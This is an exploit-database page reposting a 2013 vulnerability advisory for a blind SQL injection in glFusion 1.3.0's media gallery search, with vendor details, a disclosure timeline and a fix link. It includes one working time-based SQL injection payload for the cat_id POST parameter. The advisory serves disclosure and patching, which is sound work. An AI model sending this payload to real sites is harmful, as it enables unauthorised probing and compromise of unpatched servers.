[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

glFusion 1.3.0 SQL Injection Vulnerability

Author
Omar Kurt
Risk
[
Security Risk High
]
0day-ID
0day-ID-21220
Category
web applications
Date add
10-09-2013
Platform
php
Information
--------------------
Name :  SQL Injection Vulnerability in glFusion
Software :  glFusion 1.3.0 and possibly below.
Vendor Homepage : http://www.glfusion.org
Vulnerability Type :  Blind SQL Injection
Severity :  Critical
Researcher :  Omar Kurt
Advisory Reference :  NS-13-009
 
Description
--------------------
A dynamic system based on flexible and granular permissions, with spam
protection, forums, file management, media gallery, calendars, polls,
site-wide search, RSS feeds, and more!
 
Details
--------------------
glFusion is affected by SQL Injection vulnerability in version 1.3.0.
Example PoC url is as follows:
Blind SQL Injection Vulnerability
http://example.com/mediagallery/search.php
POST - param:
cat_id='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
 
You can read the full article about SQL Injection vulnerabilities from here
:
 
http://www.mavitunasecurity.com/sql-injection/
 
Solution
--------------------
http://www.glfusion.org/article.php/glfusion131
 
Advisory Timeline
--------------------
05/09/2013 - First contact: No response
05/09/2013 - Vendor replied
05/09/2013 - Shared details
06/09/2013 - Fix released
09/09/2013 - Advisory Released
 
Credits
--------------------
It has been discovered on testing of Netsparker, Web Application Security
Scanner - http://www.mavitunasecurity.com/netsparker/.
 
References
--------------------
MSL Advisory Link :
https://www.mavitunasecurity.com/sql-injection-vulnerability-in-glfusion/
Netsparker Advisories :
http://www.mavitunasecurity.com/netsparker-advisories/

#  0day.today [2024-11-15]  #